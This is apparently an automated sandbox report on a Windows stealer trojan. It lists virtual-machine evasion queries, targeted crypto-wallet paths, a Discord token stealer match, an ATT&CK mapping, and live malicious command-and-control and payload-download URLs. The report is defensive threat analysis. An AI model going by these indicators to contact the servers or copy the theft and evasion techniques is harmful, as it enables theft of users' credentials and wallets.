Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: dBvNa2pTbj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: dBvNa2pTbj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: dBvNa2pTbj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Windows\symbols\exe\build.pdb source: dBvNa2pTbj.exe, 00000000.00000002.438636945.000000000B200000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: build.pdb source: dBvNa2pTbj.exe
Source:	Binary string: \??\C:\Windows\exe\build.pdbNw source: dBvNa2pTbj.exe, 00000000.00000003.432950977.000000000B22C000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: build.pdb\build.pdbp? source: dBvNa2pTbj.exe, 00000000.00000002.433315540.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_00AE51A2 push esi; ret	0_2_00AE51C6
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_00AE3A20 push 414182B8h; ret	0_2_00AE3A43
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01531C69 push esi; ret	0_2_01531C80

Source: dBvNa2pTbj.exe	Static PE information: section name: X99^i@
Source: dBvNa2pTbj.exe	Static PE information: section name:

Source: dBvNa2pTbj.exe

Static PE information: 0x9BB84413 [Mon Oct 14 18:48:51 2052 UTC]

Source: initial sample

Static PE information: section name: X99^i@ entropy: 7.998809128626319

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe TID: 6360	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe TID: 6316	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareCU228LNBWin32_VideoControllerS2SFSVG9VideoController120060621000000.000000-00081963009display.infMSBDA86G2ATNKPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsKGTW2FPS)^
Source: dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Queries volume information: C:\Users\user\Desktop\dBvNa2pTbj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match

File source: Process Memory Space: dBvNa2pTbj.exe PID: 6272, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx5
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore

Source: Yara match	File source: 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dBvNa2pTbj.exe PID: 6272, type: MEMORYSTR

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match

File source: Process Memory Space: dBvNa2pTbj.exe PID: 6272, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Windows Management Instrumentation	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	141 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	33 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Timestomp	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dBvNa2pTbj.exe	55%	Virustotal		Browse
dBvNa2pTbj.exe	43%	Metadefender		Browse
dBvNa2pTbj.exe	85%	ReversingLabs	Win32.Trojan.Johnnie
dBvNa2pTbj.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ipwho.is	2%	Virustotal		Browse
holdmy1337.ga	18%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://ipwho.is/?output=xml	0%	Virustotal		Browse
https://ipwho.is/?output=xml	0%	Avira URL Cloud	safe
https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll	1%	Virustotal		Browse
https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll	100%	Avira URL Cloud	malware
https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dll	100%	Avira URL Cloud	malware
https://ipwho.is/?output=xmlx	0%	Avira URL Cloud	safe
https://holdmy1337.ga/assets/dll/EntityFramework.dll	100%	Avira URL Cloud	malware
https://cdn.ipwhois.io/flags/ch.svg	0%	Avira URL Cloud	safe
https://ipwho.is4	0%	Avira URL Cloud	safe
https://ipwho.is	0%	Avira URL Cloud	safe
http://holdmy1337.ga	100%	Avira URL Cloud	malware
https://holdmy1337.ga4	0%	Avira URL Cloud	safe
https://holdmy1337.ga/loading.txt	100%	Avira URL Cloud	malware
https://holdmy1337.ga	100%	Avira URL Cloud	malware
https://holdmy1337.ga/ginzo.php?ownerid=	100%	Avira URL Cloud	malware
https://holdmy1337.ga/assets/dll/x64/SQLite.Interop.dll	0%	Avira URL Cloud	safe
https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dll	100%	Avira URL Cloud	malware
http://ns.adobe.c/g	0%	URL Reputation	safe
https://holdmy1337.ga/assets/dll/System.Data.SQLite.dll	100%	Avira URL Cloud	malware
https://holdmy1337.ga/assets/dll/Ionic.Zip.dll	100%	Avira URL Cloud	malware
http://ipwho.is	0%	Avira URL Cloud	safe
https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dll	100%	Avira URL Cloud	malware
https://holdmy1337.gaD8	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipwho.is	136.243.172.101	true	false	2%, Virustotal, Browse	unknown
holdmy1337.ga	188.114.96.3	true	true	18%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipwho.is/?output=xml	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dll	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga/assets/dll/EntityFramework.dll	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga/assets/dll/x64/SQLite.Interop.dll	true	Avira URL Cloud: safe	unknown
https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dll	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga/assets/dll/System.Data.SQLite.dll	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga/assets/dll/Ionic.Zip.dll	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://t.me/ginzostealer_bot	dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.dr	false		high
https://ipwho.is/?output=xmlx	dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/holdthismoneybot	dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.dr	false		high
https://cdn.ipwhois.io/flags/ch.svg	dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435855400.0000000003197000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434661304.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435866825.00000000031A7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipwho.is4	dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipwho.is	dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://holdmy1337.ga	dBvNa2pTbj.exe, 00000000.00000002.434452190.0000000002F66000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga4	dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://holdmy1337.ga/loading.txt	dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga	dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://holdmy1337.ga/ginzo.php?ownerid=	dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ns.adobe.c/g	dBvNa2pTbj.exe, 00000000.00000003.433033972.000000000155C000.00000004.00000020.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.433983096.000000000155D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipwho.is	dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://holdmy1337.gaD8	dBvNa2pTbj.exe, 00000000.00000002.434619814.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
136.243.172.101	ipwho.is	Germany		24940	HETZNER-ASDE	false
188.114.96.3	holdmy1337.ga	European Union		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	662346
Start date and time: 13/07/202206:19:39	2022-07-13 06:19:39 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	dBvNa2pTbj (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@1/15@2/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.5% (good quality ratio 0.9%) Quality average: 40.7% Quality standard deviation: 35.1%
HCA Information:	Successful, ratio: 96% Number of executed functions: 58 Number of non-executed functions: 28
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:20:53	API Interceptor	1x Sleep call for process: dBvNa2pTbj.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
136.243.172.101	fg.exe	Get hash	malicious	Browse	ipwho.is/
	1cuFmm3Fj8.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	YJZvfY0Wn4.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	JP9XyWB6dd.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	kNLo5bC511.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	FFwW4V92Z7.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	6NABK7LZ8s.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	63071203.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.93
	eufive_20220307-121755.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	eufive_20220304-191420(1).exe	Get hash	malicious	Browse	ipwhois.app/xml/
	PNGS4qzFwI.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	NitroGenerator.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61
	repair inject.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61
	7TIOTyD8o4.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61
	2d.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	vUscUtP.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61
	WbqTuCZuc9.exe	Get hash	malicious	Browse	ipwhois.app/xml/
	ldzOTRmAmT.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61
	O33SMit0U1.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61
	ZDiO12EFG9.exe	Get hash	malicious	Browse	ipwhois.app/json/102.129.143.61

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
holdmy1337.ga	xOoyjLMVjE.exe	Get hash	malicious	Browse	188.114.97.3
	build.exe	Get hash	malicious	Browse	188.114.96.3
	build.exe	Get hash	malicious	Browse	188.114.96.3
ipwho.is	xOoyjLMVjE.exe	Get hash	malicious	Browse	136.243.172.101
	sSra27WE9o.exe	Get hash	malicious	Browse	136.243.172.101
	sSra27WE9o.exe	Get hash	malicious	Browse	136.243.172.101
	fg.exe	Get hash	malicious	Browse	136.243.172.101
	KEY STROKES.exe	Get hash	malicious	Browse	136.243.172.101
	er6n39LUvi.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	Akrien Crack 7.4.exe	Get hash	malicious	Browse	136.243.172.101
	Nitro Gen And Check.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	new project 1.exe.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	SecuriteInfo.com.Variant.Lazy.173867.17498.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101
	build.exe	Get hash	malicious	Browse	136.243.172.101

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	xOoyjLMVjE.exe	Get hash	malicious	Browse	188.114.97.3
	Payment Invoice..Shtml	Get hash	malicious	Browse	188.114.96.3
	CkWJfCDAeO.exe	Get hash	malicious	Browse	104.20.67.143
	https://newitventure.com/.tmb/src/NTFX/neten/	Get hash	malicious	Browse	104.17.25.14
	DocuSign for Business document_ 16V4385100.msg	Get hash	malicious	Browse	104.21.54.42
	R6NX4p7diT.exe	Get hash	malicious	Browse	162.159.135.233
	#U043e#U0440#U043a#U043e#U0441#U0442#U0430#U043d#U0432#U0440#U0430#U0431#U043e#U0442#U0435.xlsx	Get hash	malicious	Browse	104.18.42.171
	Tsunami.x86	Get hash	malicious	Browse	172.68.102.187
	Tsunami.arm7	Get hash	malicious	Browse	172.68.212.83
	orkostansocialclubfrom09.06.xlsx	Get hash	malicious	Browse	172.64.145.85
	#U260e#Ufe0fAudio-0410860479.mp4 - 90905531762049856.htm	Get hash	malicious	Browse	104.17.24.14
	#U266c voice0989876_3-2(3).hTm	Get hash	malicious	Browse	104.17.25.14
	The Coeur Group_Invoice.htm	Get hash	malicious	Browse	104.16.149.64
	https://www.menti.com/8jzk2vh115	Get hash	malicious	Browse	104.18.3.4
	INQUIRYORDER.exe	Get hash	malicious	Browse	172.67.158.167
	https://r20.rs6.net/tn.jsp?t=3Dqcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https://gxUJvvMsI.venturapower.in/?e=jean.robitaille@agnicoeagle.com	Get hash	malicious	Browse	104.17.25.14
	cmd.cmd	Get hash	malicious	Browse	172.67.218.221
	NitroGen By MaskeZen.exe	Get hash	malicious	Browse	162.159.135.232
